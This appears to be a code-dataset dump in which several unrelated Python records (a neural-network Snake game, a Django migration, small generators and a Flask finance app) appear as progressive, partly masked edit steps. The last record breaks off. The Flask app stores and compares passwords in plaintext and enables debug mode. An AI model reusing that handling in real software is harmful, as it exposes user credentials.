sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\nif __name__ == '__main__':\n for i in range(total_models):\n model = create_model()\n current_pool.append(model)\n fitness.append(-100)\n score.append(0)\n if load == 1:\n for i in range(total_models):\n current_pool[i].load_weights(load_location + str(i) + '.keras')\ntheApp = App()\nwhile True:\n for i in range(total_models):\n fitness[i] = 0\n score[i] = 0\n for i in range(total_models):\n theApp.on_execute(i)\n print('Higest score: ' + str(max(score)) + ' Model: ' + str(score.index\n (max(score))) + ' Gen: ' + str(generation))\n if save == 1:\n save_pool()\n genetic_updates()\n",
"step-5": "import random\nimport sys\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation\n\nfrom snake_game import Snake\nfrom snake_game import Fruit\nimport pygame\nfrom pygame.locals import *\n\n# Neural Network globals\ntotal_models = 50\ncurrent_pool = []\nfitness = []\ngeneration = 264\n\n# 1 if want to save pool, 0 if not\nsave = 0\nsave_location = \"Saved_Models/model\"\nload = 1\nload_location = \"Saved_Models-better/model\"\n\n# Game configurations\nWIDTH = 480\nHEIGHT = 480\nGRID_D = 12\nBLOCK_W = WIDTH / GRID_D\nBLOCK_H = HEIGHT / GRID_D\nMAX_MOVES = 150\nscore = []\n\n# Save models to file\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + \".keras\")\n print(\"Pool saved\")\n\n\ndef create_model():\n '''\n Create Neural Network as a keras model\n '''\n model = Sequential()\n model.add(Dense(12, input_dim = 8, activation = 'relu'))\n model.add(Dense(16, activation = 'relu'))\n model.add(Dense(4, activation = 'sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n\n return model\n\ndef predict_direction(snake, fruit, model_num):\n '''\n This function feeds information into the model, then determines\n which direction the snake should go\n '''\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n\n output = current_pool[model_num].predict(n_input, 1)\n \n return output.argmax()\n\ndef model_crossover(parent_1, parent_2):\n '''\n Produce offspring based on the best parents\n '''\n global current_pool\n\n # Weight of parents\n weight1 = current_pool[parent_1].get_weights()\n weight2 = current_pool[parent_2].get_weights()\n new_weight1 = weight1\n new_weight2 = weight2\n\n # Gene\n gene = random.randint(0, len(new_weight1) - 1)\n\n new_weight1[gene] = weight2[gene]\n new_weight2[gene] = weight1[gene]\n return np.asarray([new_weight1, new_weight2])\n\ndef model_mutate(weights):\n '''\n Mutate the weights of a model\n '''\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if (random.uniform(0, 1) > .7):\n change = random.uniform(-.5,.5)\n weights[i][j] += change\n \n return weights\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n\n # Calculate total fitness\n total_fitness = sum(fitness)\n \n # Breeding time\n for i in range(total_models // 2):\n # Pick two parents\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n \n # Model crossover between two parents\n new = model_crossover(parent_1, parent_2)\n \n # Mutate models\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n\n # Set new weights, reset fitness\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n\n generation += 1\n return\n\ndef check_if_closer(snake, fruit):\n head = snake.position[0]\n prev = snake.position[1]\n\n # Calculate the heads distance from the fruit, and the previous spot\n # to see if it got closer\n head_dis = math.sqrt((fruit.pos[0] - head[0]) ** 2 + (fruit.pos[1] - head[1]) ** 2)\n prev_dis = math.sqrt((fruit.pos[0] - prev[0]) ** 2 + (fruit.pos[1] - prev[1]) ** 2)\n\n if head_dis > prev_dis:\n return False\n return True\n\n\nclass App:\n '''\n Main App for game\n '''\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n \n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n \n def on_event(self, event):\n\n # Quit game\n if event.type == pygame.QUIT:\n self._running = False\n \n # Change direction of snake\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n # Increase speed of game\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n # Decrease speed of game\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n \n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n # Adjust fitness, reset move counter\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n \n if check_if_closer(self.snake, self.fruit):\n # Reward snake for moving towards fruit\n fitness[model_num] += 10\n\n self.moves += 1\n \n def on_render(self, model_num):\n self._display_surf.fill((0,124,0))\n \n # Fill every other space to create a multi color grid\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n\n # Draw sanke and fruit\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption(\"Gen: \" + str(generation) + \" Model: \" + str(model_num) + \" Score: \" + str(self.snake.score) + \" Tick \" + str(self.frames))\n pygame.display.update()\n \n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n \n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n \n while (self._running):\n for event in pygame.event.get():\n self.on_event(event)\n \n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n\n # Checks if game is paused\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n\n # Reset when snake dies\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n \n # Print fitness\n print(fitness[i])\n break\n\n # Clean up and print score\n # self.on_cleanup()\n print(int(self.snake.score))\n \nif __name__ == \"__main__\" :\n # Init models\n for i in range(total_models):\n model = create_model()\n current_pool.append(model)\n fitness.append(-100)\n score.append(0)\n\n if load == 1:\n for i in range(total_models):\n current_pool[i].load_weights(load_location + str(i) + \".keras\")\n\ntheApp = App()\nwhile True:\n\n # Reset fitness scores and player scores\n for i in range(total_models):\n fitness[i] = 0\n score[i] = 0\n\n # Play game for each model\n for i in range(total_models): \n theApp.on_execute(i)\n \n # Print high score to screen\n print(\"Higest score: \" + str(max(score)) + \" Model: \" + str(score.index(max(score))) + \" Gen: \" + str(generation))\n \n # Write these values to a file\n # fi = open(\"results.txt\", \"a+\")\n # fi.write(\"Higest score: \" + str(max(score)) + \" Model: \" + str(score.index(max(score))) + \" Gen: \" + str(generation) + \"\\r\\n\")\n # fi.close()\n\n # Save pool\n if save == 1:\n save_pool()\n genetic_updates()",
"step-ids": [
13,
15,
16,
20,
21
]
}
|
[
13,
15,
16,
20,
21
] |
# Generated by Django 3.2.3 on 2021-06-01 07:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('info', '0002_auto_20210531_1958'),
]
operations = [
migrations.AddField(
model_name='well',
name='well_status',
field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'), ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15, verbose_name='Статус скважины'),
),
]
|
normal
|
{
"blob_id": "a3239bbe4f85c9f0e1bc845245f024c3feb64923",
"index": 7476,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('info', '0002_auto_20210531_1958')]\n operations = [migrations.AddField(model_name='well', name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'),\n ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15,\n verbose_name='Статус скважины'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('info', '0002_auto_20210531_1958')]\n operations = [migrations.AddField(model_name='well', name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'),\n ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15,\n verbose_name='Статус скважины'))]\n",
"step-5": "# Generated by Django 3.2.3 on 2021-06-01 07:26\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('info', '0002_auto_20210531_1958'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='well',\n name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'), ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15, verbose_name='Статус скважины'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def lucas():
yield 2
a = 2
b = 1
while True:
yield b
a, b = b, a + b
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def lucas():
yield 2
a = 2
b = 1
while True:
yield b
a, b = b, a + b
<|reserved_special_token_0|>
for i in range(10):
print('{}: {}'.format(i, next(l)))
<|reserved_special_token_1|>
def lucas():
yield 2
a = 2
b = 1
while True:
yield b
a, b = b, a + b
l = lucas()
for i in range(10):
print('{}: {}'.format(i, next(l)))
|
flexible
|
{
"blob_id": "4745c00ca0f3ca4316117228a9d44bdb5df02877",
"index": 7799,
"step-1": "<mask token>\n",
"step-2": "def lucas():\n yield 2\n a = 2\n b = 1\n while True:\n yield b\n a, b = b, a + b\n\n\n<mask token>\n",
"step-3": "def lucas():\n yield 2\n a = 2\n b = 1\n while True:\n yield b\n a, b = b, a + b\n\n\n<mask token>\nfor i in range(10):\n print('{}: {}'.format(i, next(l)))\n",
"step-4": "def lucas():\n yield 2\n a = 2\n b = 1\n while True:\n yield b\n a, b = b, a + b\n\n\nl = lucas()\nfor i in range(10):\n print('{}: {}'.format(i, next(l)))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def print_duplicates(arr):
uniques = set()
for elem in arr:
if elem in uniques:
print(elem, end=' ')
else:
uniques.add(elem)
|
normal
|
{
"blob_id": "420c3944de0a5436a9824604fd6caf27706eb99c",
"index": 4102,
"step-1": "<mask token>\n",
"step-2": "def print_duplicates(arr):\n uniques = set()\n for elem in arr:\n if elem in uniques:\n print(elem, end=' ')\n else:\n uniques.add(elem)\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os, datetime
import urllib
from flask import (Flask, flash, json, jsonify, redirect, render_template,
request, session, url_for)
import util.database as db
template_path=os.path.dirname(__file__)+"/templates"
file=""
if template_path!="/templates":
app = Flask("__main__",template_folder=os.path.dirname(__file__)+"/templates",static_folder=os.path.dirname(__file__)+"/static")
file = open(os.path.dirname(__file__)+'/data/keys.json')
else:
app = Flask("__main__")
file = open('./data/keys.json')
app.secret_key = os.urandom(32)
content = file.read()
keys = json.loads(content)
# has a 5000 calls/day limit
PIXABAY_KEY = keys['Pixabay']
PIXABAY_STUB = "https://pixabay.com/api/?key=" + PIXABAY_KEY + "&q=" #separate words with "+"
@app.route('/')
def home():
if "username" in session:
id_num=db.search_user_list(session["username"], is_usrname=True)[0][2]
finavail=db.search_finance_list(id_num)
goalavail=db.search_goal_list(id_num)
if finavail:
session["finances"]=session["username"]
if goalavail:
session["goals"]=session["username"]
set_goal = db.search_goal_list(id_num)
print(set_goal)
if set_goal != []:
user_id = db.search_user_list(session['username'], is_usrname=True)[0][2]
g = db.search_goal_list(user_id)
b = db.search_finance_list(user_id)
t = db.search_time_list(user_id)
date_now = datetime.date.today()
price = g
perc = g
delta_months = 0
if g != []:
g = g[0][0]
if price != []:
price = price[0][1]
if perc != []:
perc = perc[0][2]
##function to get difference in months between 2 dates
def months_between(date1,date2):
if date1>date2:
date1,date2=date2,date1
m1=date1.year*12+date1.month
m2=date2.year*12+date2.month
months=m2-m1
if date1.day>date2.day:
months-=1
elif date1.day==date2.day:
seconds1=date1.hour*3600+date1.minute+date1.second
seconds2=date2.hour*3600+date2.minute+date2.second
if seconds1>seconds2:
months-=1
return months
if t != []:
t = t[0][0]
delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))
print(delta_months)
img = db.search_image_list(user_id)
if img != []:
img = img[0][0]
if b != []:
bal = b[0][0]
inc = b[0][1]
print(b)
print(g)
print(price)
print(perc)
print(img)
if g or price:
if b:
print("Used the first one")
perc_complete = (delta_months * (perc / 100.0) * inc)/price
print(perc_complete)
if perc_complete > 1:
perc_complete = 1
return render_template('home.html',fin=finavail,goal=goalavail, set_goal= set_goal, goal_name =g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )
return render_template('home.html',fin=finavail,goal=goalavail)
return render_template('home.html',fin=finavail,goal=goalavail)
return render_template('home.html')
@app.route('/register')
def register():
return render_template('register.html')
@app.route('/login')
def login():
return render_template('login.html')
@app.route('/auth', methods=['POST'])
def auth():
user = request.form.get("user")
paswrd = request.form.get('pass')
if request.form.get("submit")=="Register":
paswrd2 = request.form.get("pass2")
print(paswrd)
print(paswrd2)
if paswrd != paswrd2:
flash("Passwords Do Not Match")
return redirect(url_for('register'))
if db.register(user, paswrd):
flash("Registered successfully")
session['username'] = request.form['user']
else:
flash("Unable to register the user")
return redirect(url_for('register'))
print("Username has been registered previously!")
else:
match=db.search_user_list(user, is_usrname=True)
if len(match)>0:
if match[0][1]==paswrd:
session["username"]=request.form["user"]
else:
flash("wrong Password")
return redirect(url_for('login'))
else:
flash("User not found")
return redirect(url_for('login'))
return redirect(url_for('home'))
@app.route('/finances')
def finance():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
user_id = db.search_user_list(session['username'])[0][2]
items = db.search_finance_list(user_id)
daily = db.search_expense_list(user_id, is_id=True)
monthly = db.search_monthly_list(user_id, is_id=True)
ratings = db.search_rating_list(user_id, is_id=True)
print(ratings)
print(f"Unlike month, this is daily: {daily}\n")
w = dict([ (x[0], x[1]) for x in daily ])
s = dict([ (x[0], x[1]) for x in monthly ])
r = dict([ (x[0], x[1]) for x in ratings ])
print(f"THIS is monthly: {monthly}")
print(f"THIS is s: {s}")
print(f"These are the ratings: {r}")
total = 0
m_total = 0
for x in w.values():
total += float(x)
for x in s.values():
m_total += float(x)
if items != []:
bal,income,i = items[0]
diction = {"Balance":bal, "Income":income}
return render_template('findata.html',
diction=diction,
daily=w,
months = s,
total=total,
mtotal = m_total,completed=True, ratings=r)
return render_template('findata.html')
@app.route('/fincalc', methods=['POST'])
def calc():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
# print(request.form)
session["finances"]=session["username"]
bal = request.form['balance'][1:]
monthly = request.form['monthly-inputs']
income = request.form['income'][1:]
# print(request.form)
s = request.form
d_rates = request.form['daily-importance']
m_rates = request.form['monthly-importance']
print(d_rates)
user_id = db.search_user_list(session['username'])[0][2]
daily_dict = json.loads(d_rates)
monthly_dict = json.loads(m_rates)
print(daily_dict)
print(monthly_dict)
dai_im = dict([x for x in daily_dict.values()]) # {expenseName: rating, expenseName2: rating, ...}
mon_im = dict([x for x in monthly_dict.values()])
file=os.path.dirname(__file__)+f'/static/ratings.csv'
stringg = "{"
try:
with open(file) as f: # if readable, file already exists
print("File found, not creating...")
f.close()
except Exception as e:
print(e)
with open(file, 'a+') as f: # creates the file
print("File not found, creating...")
f.write(f"ratings,id\n")
f.close()
for item in mon_im:
db.add_rating(item, mon_im[item], user_id)
stringg += "'" + item + "'" + " : " + "'" + str(mon_im[item]) + "'" + " "
for item in dai_im:
db.add_rating(item, dai_im[item], user_id)
stringg += "'" + item + "'" + " : " + "'" + str(dai_im[item]) + "'" + " "
stringg += "}," + str(user_id) + "\n"
with open(file, "r") as f:
lines = f.readlines()
with open(file, "w") as f:
for line in lines:
if str(user_id) != line.strip("\n").split(",")[1]:
f.write(line)
f.write(stringg)
f.close()
daily = request.form['all-inputs']
print(f"This is daily: {monthly}")
daily = json.loads(daily) # dictionary
monthly = json.loads(monthly)
print(f"This is daily now {monthly}")
w = dict([x for x in daily.values()]) # {expense1: $$$, expense2: $$$, ...}
m = dict([x for x in monthly.values()])
print(f"\nThis is calculated m:{m}\n")
db.add_finances(bal, m, income, w, user_id)
flash("Finances updated")
return redirect(url_for('home'))
@app.route('/goals')
def goals():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
user_id = db.search_user_list(session['username'])[0][2]
g = db.search_goal_list(user_id)
b = db.search_finance_list(user_id)
t = db.search_time_list(user_id)
date_now = datetime.date.today()
price = g
perc = g
delta_months = 0
if g != []:
g = g[0][0]
if price != []:
price = price[0][1]
if perc != []:
perc = perc[0][2]
##function to get difference in months between 2 dates
def months_between(date1,date2):
if date1>date2:
date1,date2=date2,date1
m1=date1.year*12+date1.month
m2=date2.year*12+date2.month
months=m2-m1
if date1.day>date2.day:
months-=1
elif date1.day==date2.day:
seconds1=date1.hour*3600+date1.minute+date1.second
seconds2=date2.hour*3600+date2.minute+date2.second
if seconds1>seconds2:
months-=1
return months
if t != []:
t = t[0][0]
delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))
print(delta_months)
img = db.search_image_list(user_id)
if img != []:
img = img[0][0]
if b != []:
bal = b[0][0]
inc = b[0][1]
print(b)
print(g)
print(price)
print(perc)
print(img)
if g or price:
if b:
print("Used the first one")
perc_complete = (delta_months * (perc / 100.0) * inc)/price
print(perc_complete)
if perc_complete > 1:
perc_complete = 1
return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )
else:
print("Used the second")
return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img)
else:
if b:
return render_template('goals.html', bal=bal, income=inc)
else:
return render_template('goals.html')
@app.route('/gcalc', methods=['POST'])
def gcalc():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
goal_name = request.form['goal']
goal_price = request.form['goal_price'][1:]
percentage = request.form['slide']
print("This is percentage:")
print(percentage)
print("gcalc")
print(goal_name)
print(goal_price)
user_id = db.search_user_list(session['username'])[0][2]
db.add_goals(goal_name, goal_price, percentage, user_id)
a = db.search_image_list(user_id)
print(a)
# optimization to save on api calls
if a == [] or a[0][2] != goal_name:
try:
l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ', '+') + "&image_type=photo")
p = json.loads(l.read())
img = p['hits'][0]['webformatURL']
except:
return render_template('error.html', err="Cannot connect to API", fix="Try refreshing or contacting the site owner")
else:
img = a[0][1]
db.add_images(img, goal_name, user_id)
flash(f"Goal for {goal_name} at ${goal_price} has been added!")
return redirect(url_for('home'))
@app.route('/sankey')
def sankey():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
user_id = db.search_user_list(session['username'])[0][2]
return render_template('sankey.html',idnum=user_id)
@app.route('/pie')
def pie():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
user_id = db.search_user_list(session['username'])[0][2]
return render_template('pie.html',idnum=user_id)
@app.route('/area')
def area():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
user_id = db.search_user_list(session['username'])[0][2]
goal=db.search_goal_list(user_id)
if goal == []:
return redirect(url_for('goals'))
daily=db.search_expense_list(user_id)
monthly=db.search_monthly_list(user_id)
dadict={}
modict={}
print(goal)
ratings={}
for names in daily:
dadict[names[0]]=names[1]
for names in monthly:
modict[names[0]]=names[1]
print(dadict,modict)
percent=0
for names in db.search_rating_list(user_id):
print(names)
if names[0] in modict:
percent=(modict[names[0]]*12)/goal[0][1]
if names[0] in dadict:
percent=(dadict[names[0]]*30*12)/goal[0][1]
if names[1]<=6 and percent >=0.05:
ratings[names[0]]=(names[1],percent)
print(ratings)
return render_template('area.html',idnum=user_id,ratings=ratings)
@app.route('/logout')
def logout():
if 'username' in session:
session.pop('username')
return redirect(url_for('home'))
@app.route('/account')
def account():
if 'username' not in session:
flash("You must be logged in to access this page")
return redirect(url_for('login'))
# print(db.search_user_list(session['username']))
user_list = json.dumps(db.search_user_list(ret_all=True))
print(json.dumps(db.search_user_list(ret_all=True)))
return render_template('accounts.html', user_list=user_list)
@app.route('/update', methods=["POST"])
def update():
print('this is the updates')
update_dict = request.form['all-options']
update_dict = json.loads(update_dict)
print(request.form)
user_ids = db.search_user_list(session['username'])
user = user_ids[0][-1]
print(user)
db.update_user_list(update_dict['username'] or user_ids[0][0], update_dict['password'] or user_ids[0][1], user)
db.reset_statistics(user, update_dict['reset'])
session.pop('username')
session['username'] = update_dict['username'] or user_ids[0][0] # change username in session
flash("Account information updated successfully")
return redirect(url_for('home'))
@app.route('/del')
def delete():
if 'username' not in session:
flash("Woops. You can't be here")
return redirect(url_for('login'))
user = db.search_user_list(session['username'])[0][-1]
print(user)
db.update_user_list(None, None, user, rem=True)
flash("User successfully removed")
session.pop('username')
return redirect(url_for('home'))
if __name__ == "__main__":
app.debug = True
app.run()
|
normal
|
{
"blob_id": "5c20eefe8111d44a36e69b873a71377ee7bfa23d",
"index": 6768,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\n<mask token>\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 0\n m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return 